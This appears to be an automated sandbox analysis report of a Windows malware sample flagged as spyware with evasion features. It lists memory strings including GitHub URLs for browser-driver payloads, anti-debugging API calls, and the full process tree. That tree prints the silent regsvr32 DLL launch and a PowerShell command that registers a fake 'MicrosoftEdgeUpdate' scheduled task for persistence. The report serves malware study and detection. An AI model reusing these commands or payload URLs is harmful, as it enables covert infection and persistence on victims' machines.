Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: https://d.symcb.com/rpa06
Source: regsvr32.exe, regsvr32.exe, 0000000F.00000002.2611799536.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.2240229224.0000011CF15FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2365576067.000001471006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary

.NET source code contains very large array initializations

Source: 9.2.regsvr32.exe.2d8131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.cs	Large array initialization: HcZdqQ5U4: array initializer size 305328
Source: 9.2.regsvr32.exe.2f90000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.cs	Large array initialization: HcZdqQ5U4: array initializer size 305328

Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA338A040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,RtlFreeHeap,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,		9_2_00007FFDA338A040
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA338A040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,		15_2_00007FFDA338A040

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Code function: 2_2_02441260	2_2_02441260
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Code function: 2_2_02441D20	2_2_02441D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33820D0	9_2_00007FFDA33820D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33E0940	9_2_00007FFDA33E0940
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA338A040	9_2_00007FFDA338A040
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33DEFF0	9_2_00007FFDA33DEFF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA342C3B0	9_2_00007FFDA342C3B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3423390	9_2_00007FFDA3423390
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33DCB90	9_2_00007FFDA33DCB90
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA338B430	9_2_00007FFDA338B430
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3410BF0	9_2_00007FFDA3410BF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA34192A0	9_2_00007FFDA34192A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33E9320	9_2_00007FFDA33E9320
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33E5AF0	9_2_00007FFDA33E5AF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA340E970	9_2_00007FFDA340E970
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33B6160	9_2_00007FFDA33B6160
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA342E980	9_2_00007FFDA342E980
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3386A50	9_2_00007FFDA3386A50
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33909E0	9_2_00007FFDA33909E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3389060	9_2_00007FFDA3389060
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3390880	9_2_00007FFDA3390880
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33D5890	9_2_00007FFDA33D5890
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33BFFE0	9_2_00007FFDA33BFFE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA338F7E0	9_2_00007FFDA338F7E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3432000	9_2_00007FFDA3432000
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33A6660	9_2_00007FFDA33A6660
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33AC740	9_2_00007FFDA33AC740
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33D8740	9_2_00007FFDA33D8740
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3423DA0	9_2_00007FFDA3423DA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33A5DD0	9_2_00007FFDA33A5DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3432640	9_2_00007FFDA3432640
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA3390650	9_2_00007FFDA3390650
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA33D6540	9_2_00007FFDA33D6540
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_02DD2219	9_2_02DD2219
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_02DD3426	9_2_02DD3426
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435A575	9_2_00007FFD3435A575
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435F74D	9_2_00007FFD3435F74D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435CEF3	9_2_00007FFD3435CEF3
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34360F88	9_2_00007FFD34360F88
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD343530B9	9_2_00007FFD343530B9
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435217A	9_2_00007FFD3435217A
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3436D33F	9_2_00007FFD3436D33F
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435D3C8	9_2_00007FFD3435D3C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34352C48	9_2_00007FFD34352C48
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435A5BD	9_2_00007FFD3435A5BD
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435A5D3	9_2_00007FFD3435A5D3
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34362D95	9_2_00007FFD34362D95
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34357643	9_2_00007FFD34357643
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34359EB5	9_2_00007FFD34359EB5
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34359E67	9_2_00007FFD34359E67
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD343566F2	9_2_00007FFD343566F2
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435F7BD	9_2_00007FFD3435F7BD
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34361005	9_2_00007FFD34361005
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD343530D0	9_2_00007FFD343530D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD343611FA	9_2_00007FFD343611FA
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3436DC01	9_2_00007FFD3436DC01
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34520060	9_2_00007FFD34520060
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD345252C2	9_2_00007FFD345252C2
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34525954	9_2_00007FFD34525954
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34525E18	9_2_00007FFD34525E18
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34529C4D	9_2_00007FFD34529C4D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34527034	9_2_00007FFD34527034
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD345257FD	9_2_00007FFD345257FD
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD345273E0	9_2_00007FFD345273E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34525BE4	9_2_00007FFD34525BE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3455308D	9_2_00007FFD3455308D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3455851D	9_2_00007FFD3455851D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3455000A	9_2_00007FFD3455000A
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34551E43	9_2_00007FFD34551E43
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34526FA4	9_2_00007FFD34526FA4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD343528FA	10_2_00007FFD343528FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD343554FA	10_2_00007FFD343554FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD34355DFA	10_2_00007FFD34355DFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD34355EF2	10_2_00007FFD34355EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD3435A36D	10_2_00007FFD3435A36D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD34354FFB	10_2_00007FFD34354FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD343438DD	12_2_00007FFD343438DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD34348D10	12_2_00007FFD34348D10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3434D9BD	12_2_00007FFD3434D9BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD34344DFB	12_2_00007FFD34344DFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD34348AB5	12_2_00007FFD34348AB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3434B2D8	12_2_00007FFD3434B2D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3434BAFB	12_2_00007FFD3434BAFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD343466FB	12_2_00007FFD343466FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD34348BFA	12_2_00007FFD34348BFA
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33820D0	15_2_00007FFDA33820D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33E0940	15_2_00007FFDA33E0940
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33DEFF0	15_2_00007FFDA33DEFF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA342C3B0	15_2_00007FFDA342C3B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3423390	15_2_00007FFDA3423390
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33DCB90	15_2_00007FFDA33DCB90
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA338B430	15_2_00007FFDA338B430
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3410BF0	15_2_00007FFDA3410BF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA34192A0	15_2_00007FFDA34192A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33E9320	15_2_00007FFDA33E9320
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33E5AF0	15_2_00007FFDA33E5AF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA340E970	15_2_00007FFDA340E970
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33B6160	15_2_00007FFDA33B6160
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA342E980	15_2_00007FFDA342E980
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3386A50	15_2_00007FFDA3386A50
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33909E0	15_2_00007FFDA33909E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3389060	15_2_00007FFDA3389060
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3390880	15_2_00007FFDA3390880
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33D5890	15_2_00007FFDA33D5890
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA338A040	15_2_00007FFDA338A040
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33BFFE0	15_2_00007FFDA33BFFE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA338F7E0	15_2_00007FFDA338F7E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3432000	15_2_00007FFDA3432000
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33A6660	15_2_00007FFDA33A6660
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33AC740	15_2_00007FFDA33AC740
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33D8740	15_2_00007FFDA33D8740
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3423DA0	15_2_00007FFDA3423DA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33A5DD0	15_2_00007FFDA33A5DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3432640	15_2_00007FFDA3432640
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA3390650	15_2_00007FFDA3390650
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA33D6540	15_2_00007FFDA33D6540

Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFDA341C350 appears 40 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFDA338FE90 appears 48 times

Source: 8n26gvrXUM.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8n26gvrXUM.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 8n26gvrXUM.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 8n26gvrXUM.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 8n26gvrXUM.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-O7IBF.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-O7IBF.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-66O79.tmp.7.dr

Static PE information: Number of sections : 11 > 10

Source: 8n26gvrXUM.exe, 00000000.00000003.2115978874.000000007FE33000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe
Source: 8n26gvrXUM.exe, 00000000.00000003.2115407999.0000000002507000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe

Source: 8n26gvrXUM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 9.2.regsvr32.exe.2d8131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.regsvr32.exe.2f90000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@26/26@0/1

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_2_00007FFDA338B900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,

9_2_00007FFDA338B900

Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp

File created: C:\Users\user\AppData\Local\unins000.dat

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\GlamorousBath
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\04cc3a8c0bf2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03

Source: C:\Users\user\Desktop\8n26gvrXUM.exe

File created: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\8n26gvrXUM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: 8n26gvrXUM.exe	ReversingLabs: Detection: 50%
Source: 8n26gvrXUM.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\8n26gvrXUM.exe

File read: C:\Users\user\Desktop\8n26gvrXUM.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe"
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp" /SL5="$203E2,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process created: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp" /SL5="$30426,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp" /SL5="$203E2,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES	Jump to behavior
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process created: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp" /SL5="$30426,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Section loaded: apphelp.dll	Jump to behavior
